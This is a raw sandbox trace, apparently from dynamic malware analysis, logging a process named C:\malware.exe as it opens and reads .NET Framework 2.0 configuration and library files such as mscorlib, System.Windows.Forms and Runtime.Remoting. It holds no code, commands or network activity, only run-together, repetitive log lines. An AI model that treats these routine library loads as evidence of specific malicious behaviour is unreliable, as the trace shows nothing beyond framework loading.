29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.configmachine.config
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.configmachine.config
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.configmachine.config
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.configmachine.config
29/2/2020 - 1:45:46.309Unknown1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.configmachine.config
29/2/2020 - 1:45:46.309Open1480C:\malware.exeC:\Windows\assembly\GAC_32\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a
29/2/2020 - 1:45:46.309Open1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a
29/2/2020 - 1:45:46.309Unknown1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a
29/2/2020 - 1:45:46.309Open1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Unknown1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Open1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Open1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a
29/2/2020 - 1:45:46.309Unknown1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Open1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Open1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Unknown1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Open1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Unknown1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Unknown1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.309Open1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
29/2/2020 - 1:45:46.309Open1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
29/2/2020 - 1:45:46.325Open1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
29/2/2020 - 1:45:46.325Open1480C:\malware.exeC:\malware.exe.Local
29/2/2020 - 1:45:46.325Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc
29/2/2020 - 1:45:46.325Unknown1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc
29/2/2020 - 1:45:46.325Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc
29/2/2020 - 1:45:46.325Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.325Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.325Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.325Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.325Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.325Open1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dll
29/2/2020 - 1:45:46.340Unknown1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.340Open1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dll
29/2/2020 - 1:45:46.340Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.387Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.434Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.481Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.481Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.575Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.622Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.668Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.715Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.762Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.809Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.856Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.903Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.950Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.997Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:47.43Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:47.90Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:47.137Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:47.184Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:47.231Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:47.278Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:47.325Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:47.372Open1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dll
29/2/2020 - 1:45:47.512Unknown1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:45:47.512Open1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dll
29/2/2020 - 1:45:47.512Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:45:47.559Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:45:47.606Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:45:47.653Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:45:47.700Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:45:47.747Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:45:47.793Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:45:47.840Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:45:47.887Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:45:47.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:45:47.981Open1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dll
29/2/2020 - 1:45:48.122Unknown1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:48.122Open1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dll
29/2/2020 - 1:45:58.90Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dllSystem.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:58.137Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dllSystem.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:58.184Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dllSystem.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:58.231Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dllSystem.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:58.278Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:58.325Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:58.372Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:58.418Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:58.465Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:58.512Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:58.559Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:58.606Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:58.653Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:58.700Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:58.747Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:58.793Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:58.840Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:58.887Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:58.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:58.981Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:59.28Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:59.106Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:59.153Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:59.200Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:59.247Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:59.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:59.340Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:59.387Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dllSystem.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:59.434Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dllSystem.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:59.481Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:59.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:59.575Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:59.622Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:59.668Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:59.715Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dllSystem.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:59.762Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dllSystem.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:59.809Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:59.856Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:59.903Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:59.950Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:59.997Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.43Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:0.90Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:0.137Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:0.184Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:0.231Open1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\uxtheme.dll
29/2/2020 - 1:46:0.231Open1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
29/2/2020 - 1:46:0.278Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.dllSystem.Windows.Forms.dll
29/2/2020 - 1:46:0.325Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.dllSystem.Windows.Forms.dll
29/2/2020 - 1:46:0.372Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.dllSystem.Windows.Forms.dll
29/2/2020 - 1:46:0.418Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.dllSystem.Windows.Forms.dll
29/2/2020 - 1:46:0.465Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:0.481Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:0.481Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:0.481Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:0.481Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
